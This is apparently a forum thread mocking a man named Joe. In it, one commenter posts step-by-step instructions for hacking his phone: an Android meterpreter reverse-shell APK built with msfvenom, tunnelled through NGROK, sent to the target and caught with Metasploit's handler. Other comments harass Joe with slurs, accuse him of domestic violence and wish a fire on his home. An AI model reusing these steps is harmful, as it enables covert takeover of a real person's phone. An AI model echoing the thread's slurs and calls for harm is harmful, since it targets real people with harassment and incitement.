Looks like Joe has a busy day lined up

54  2019-06-17 by SibHashian13


This got a nigga’s ribs hurtin

You hacked his phone so he’ll be making another “control-alt-delete” post


I was googling you can actually hack a phone I’m sure one of us can pull it off

If anyones interested :



- Install Kali Linux, via a live USB, without persistence; or on a virtual machine

- Once installed,update the system to the latest version, setup Proxychains and NGROK

- Set NGROK a port to listen on, and generate an external address to port forward to.

-Start a terminal, type:

"msfvenom -p android/meterpreter/reverse_tcp LHOST="replace this with the external IP NGROK generated" LPORT="the port you told NGROK to listen on" R > /root/Desktop/whateverfilename.apk


- This will generate a payload that will start a meterpreter session when installed on the targets machine. Send
it via email, or whatever delivery method you want


- Open a new terminal, type



- and wait for metasploit to start


- then start the payload listener. Type:


        "use exploit/multi/handler 

        set payload android/meterpreter/reverse\_tcp\]

        set lhost

        set lport "replace with the port listed in NGROK "


- and wait for the target to install the file. If it connects, it'll tell you you have an active session. You can more
or less do whatever you want from there.

I wish I knew what any of this meant there’s a few people I’d like to hack

You forgot “own libtards”

“Try plan number 456848 to destroy the Reddittards”

“Get ointment for my udders”

“Foiled again! Back to the ol’ drawing board!!!”

10:48 AM Cash welfare check

You of all people should not need to be told that carol is not wife material

Come on

Graze aggressively near Big Apple Ranch

What about own some libtards out in public and remind people about my heroic service as a line cook in the army

You forgot “Iron Carols disfigured body”

I prefer “rumpled”

Damn, all of that before 8am

A day without child spit?!?!?!

Do you put breathe or drink water on your daily calendar? It is implied brotherman.

It's a joke but all of this shit is real. Joe is a wife-beating shitty dad who doesn't care about anyone but himself. The Compound housefire can't come soon enough